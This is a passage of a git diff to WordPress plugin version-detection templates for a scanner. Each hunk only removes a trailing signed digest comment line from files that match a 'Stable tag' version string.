b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022031629b4c751eab3c24b745f465c50e011cae9c1bf67046a6c3b96fc16cd358ec022100d515060888b5e745b28b1423694d2db39e9372b7486f018bcaaadd8970812ab1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 5d8d568ae7..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f865d83ea12fd0e80529fa8cd38c2658197e75ace33daca7b82f2bae983f879b02207b6429b0d1f973de9a66a360b5150950ba0fe3523b963b359786a6e75c21cf1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 02da2f07c5..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022045cf0950fce19982638fd094a50c8ed066cf7df47b87a30db1d3fac2ce81e8f0022100bb0eacdf227e4b7b6b7fd9b25f9d27d66824d0cd708805fccf18ecfec0dc64de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eea7de58cf..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220290cb74d119d50578f2e7f46bb1fc3d38eb5c1ea9ae804694daa3ecc203c4544022100e9647debb10e9fab2c62d75dbc69591ea564f0bc97e6cc38665a0e19f6a1aa75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 78470aa5a9..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200fe11db43dd80bbb0781d32589970b0f1371ec959c5b6a6cc31c56250c6ba2d8022100e8d3d60ff7018e53c1d8042240a083b2f29c415c4b070cd9c0698933ea17dda2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 71860fcd84..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203a44fd5f82d7f9f74e934eec1f9230d0a07e9361f82a95436cdbd490c0d11cfb02201c6c8d26d640cd50ca812b3c48ed4cc7d6bf940aaf64f9e8eb863e0af7d9ab74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 45d9d673ff..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022065a743e39b5131290eee07f82923d7af3c5916bf79116b68b3b2b8396bcdcfd7022061dbeb41be698d79b31ac3f00cd8c29faa46fc131fe232a927473bfeb84976c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 2a0c75f577..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ffd4e8afcc413ec7656f43235aacf76d6229ed2f7d963d790383d54c5aec223b022005fa8a6b0f52f0cdc285beef656be1be5982f546a9ee94ef727ba5825208273e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 7fe90354d4..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008d93c9a79a499ff8f9f3b3d7553609e72e7e74fb2f2243b535f331246340d38c022100e1ba3323138b85a0bb572a54b7ac8251083783ba9ee5fb9563d4bb3d9ceb576f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index ec1d5f83ec..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022016d81309afc8801f1f650c9a498bbad8ac5fb4ee66045377d5f1d6a8d907653f022076f9f4dba26ed45a303b1c42becf5a39fc970bc74901319800f4ba31d45b58b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 18dc8c28d4..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6159eb5190bcbfbb9989a852fe313888942b26371cdabac91aae71fc8bf8b790221008346bd496e8dc15448ae00f17bca50381295520565b89be956a4dae4121afad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 78d66d4f12..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009304c15e0a854543bbdbc96ae62f92adfb38cb817896e08e3fe20a79633a08b5022076513aa87c4bb9447186b7f237174c58d612cbe4f7d3c7307694173fda37fb94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3d1b90c0e5..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040e88eb388ecf2d2aaece6a19ac2b4746af2bc31721e697c6a87801558abe339022100f4bd5f38aedf197933f9327e64a731796b548b558d993179d7ab1bb0f283a336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 1a1b79acff..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100982eb0966f82e3ba923e9d3d89b83bffa93610001eefc6210dabc727f86b7292022100f1356b42ce1b65459d226d4483eeb27e6259a570bac2664aae1d7ba86094874c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b6f741ad17..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bd65ecae5212bedeeb6aa23c7292e05ffafc1acfc51a9255b694b5f70dc3fa7302205b794a92d5c2770a61c51df78d16cd52389b37005df1d89bf71bb01f3a96b4b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 53421c0e42..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d92f3c11ee1d4353b6aed075a246ca0319c6f5676f0a5a1e4b13b41b72b652702207b7443592ae1a721dde63816c974b5d0fdbc777f49b8e86f43d9d73354ad04cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 7ff74a15cd..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f952c204555255cad6d7fd1c6ebe15d0686672129994affb7ede8c9f135231ab022072dae74539075bf48cbbe47ba5c49062ef46ce58cc75ee4a108540343f40c80b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index dac51f089f..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220094d24ce85ce89fd274106dd318e3b895eb753d34d89d7d45fd37b7aceaf1154022005052f5ee3ca6d4adb5c21c3c0f3fa18598872874703662259de0fad6c3bc9f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index b224206553..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202f829a6dc0fe0f94be929908332c45602de313f842d73c8c92a9ff4c6c902210022041d45282656fc671eca3c39bfd510fc67d0aee595cba1af9d8fc023d9c6bc4ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index d1f0db8cd7..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ddaa9ea93c4714dfffa975b15ed82cf393c038d0a7362a204c99048494dc0e0d022053ea47ebb6531afd990e37b3dc048eef833be284659d22a46de391440b9277ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 142bddd7df..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088aeba65c4672a65cff69c845b90ff35533626861c8f56c466d476e7822dca1e022100d458c0bc6e4ebed03ad3cf6b992da8dfddba90e174b8441f97c50491375901f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 509a99a8ee..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203933da62beda7e5774d52cb5c772215a802a2ccf3bb87bbf86c24a3c6e66678c022100bf64baa213d50e60cde901200f0697ec617b8730294eb7d0495011ddec95b3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index d680949003..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d3edb8af38875401f46fc8a142b1aa15f58501193d1656acaf7459b451d10231022100cae34d35e7b85bab19d671bdd837736736cc5231cbcc7608dfa7e251c62d7a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index bd7b7857c0..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010c53988782fc6cad0203f5598338fe0c083cd360c9e6b1ad240a1c4bba24216022100a3fd9200edf2c506f6795643adb20f1a53c94960e1ee0b967ebc3fa977dcfbfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 707e93ac42..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205093dc7024015d33baf8c3f6024a8a740e5c9872c5b3560742bce88d13d7cb5502204d5f1391977a92a0e56f27cbadd4acfb88d8e787700a2ce2db09db8f8e0305c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 21b5d67eea..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a756ddae584e93d86a8c456ef30d546ebcc754ad2b7b6aa4b470a2ed68cca19d022100902c93696d2ce698824c5c989c2d12d7521dd120727d5ee3a5cb604de597be22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 6c72acbb97..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220155994ef9bd41341955ae3f0f2b39c7ddadb04ea679982b671236501be5d37b80221008e1e05aae152e37e2f8141d255b4da2c7619ab113798f38e16549fae25c1be19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 8eb7ed31e7..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a8c022b0013ec8ace9d43452a666a401d50ffdac2ef2f920c53d0b2b7dbc0f3102206350700ba4b17d1ec9e7cba0163937286516902e6f06f3e6d9693d3984d72d9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 23e4345102..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ea9310df066e744622cb4bac064920e8e5e1a13b3957140922da928ecf6dffe6022064fdc7f82f16f82bc5e298cd54a7de7fa06210c6d63b541e085f8ff58091a6a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 64471f9c12..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202154f21e4b042c9149f8b65247cfdd1989ecab22a64c9fa0a31682d1b1fbf80c022015893cc6ecb54e672874d2899237a0c30b12071a11e2855ab9c27f9482c74cd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af2dc8ab5c..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009668cc6356cea9e16c9715b1fd4fa4cd2b9dd6db86438ff223a9fab1ac6b6ece022100d248f37d321f6b8219eb5d249efb10d37a215b3898729cb17a012f407a01f51b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 1ec2c6dd13..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070ce423da2cc6d6c837f29babe0d64ead5d6a030af4c26b7fca4442a4fc6021f0220086d6e1f3cc655f638d99586147f3981975830e51a9e6e681b312079600a637e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index a0a9068461..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008674227c0b35a86eaec27b25f82c48a83449db7752d1490ed99b3427e335fd5b022034b58279f5557da98e30a85b9397832c47adb0e9fc59d82c60ec4bca6be53fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index e497813ceb..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045f4cf2cbbdca2c0c1ffcb5aa4a87249470aef7725e3b1e4ba3f06c860a4b8a102204c9f3cdbce5d8246bd467f0777bcf4610b26c03f6e07e097f54e28d02d3eb86b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 12f00b3c25..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb854a5ff0fed535e28f6b3b3e982a9bb8788dea0d5f603062bc345d59d2eb0f022100bd9535badbb52aac6b3bd68dd7eaaa6fa5b5909846440e6267a5b5d416f02b58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 34701e0b7a..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024beaa04b7882c8419dfda3073c5a784ab2c2b48c4b68a6196e51b192c4a731402200a5c8740a25c47f15f7efe2d9673ca1c53dc41326af35d1c4985d8390a438e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 7023e41331..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057808db9f22ce25bc9ec10680b4c7612d05a901c8808a461ede79f66b6b3ea12022078f8eb29be723f0bda3823a155fce1fa84a7bd2245f33b93a0c1b2eef018e887:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 4b0711f504..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aeb3c433a63870b21ada1c801b08333161956c2344f0a60b83e0d2435bf774c302206fb64c3a694b4001e399a6765c1650b6ea9825d208647b573f8e1e429ab3b7c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index a6ff8bcae9..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201423476330f96a852fe2cc639a893dcd4a0b5ed6d66fecc5c2032cc0a427518f02207bb6a507e9ca4a14d97f4ba8663ac0a1335bb2c7fca4a2c5a590f520bc46cbac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7d00dd9b8b..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b89287a79b14530749a141a17ce2c5cd16b9e7e39f1e97b5fca004c5a31c56d02210084df08b8e1cccac7464f84945b0730601841af7b0fd328f946d15d1910360829:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index e90d81dd81..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e15b608be823de0b91fef5725713b4560490deeaa927834de31b467f4b1ce040022100a93396384c19b32c895ea04ff8d7ccdf3de4a913314ec327437c5efaeef70477:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 16b85e713e..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d94da120a60b23a7f31192657501efcb718b410d519f91d670beb2e726c588302200d5820dd4b9ffa6d535d84ec1ffd2f6869fab49240018996889a99eec8a86c40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 5190fd3776..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203877c251237f1b78a60033b615e9691385935012619b1045c12ba319f24f58aa022059402499e78eeef1d874b8962502bdbbbb6b92b7ee48a618666ad83ec5267663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index d05fe6fea9..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bff746a424430951de7cb5b16395507797ddf8ddc584319281b63845691d2dbb02205cfc9a4c7fcdfad1590ab1666bf5b74bcd962fd17ba04f31aca3c68e1791f73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 812c8a2cf6..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2f5b3f4e504bdb8a0954ac0f946df439b61abc62c0fc2d43186fe0b63fa19f40221009f1a4f806647e4eb575d8b247988ebe446194551859af652205ac6ddb5ab3cae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index e2cd021086..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207313a355cfb85ddeac6bfa05e73a498f3edd44ccc67c713409b713e6d736162502205a51630503d393ba65f858f701bc2425de631442c12460afa8286684f1bea5f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 0ba9cfafec..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc9cb7a942485f086c12a2e6cfdb8ee6d84bde39b9ec9bb3cad41cac8cc6f49f02201856d40e1d3e163dbbf714004587075fdb42654d251070224e69b17f83df5f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 3c6a3830ce..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ 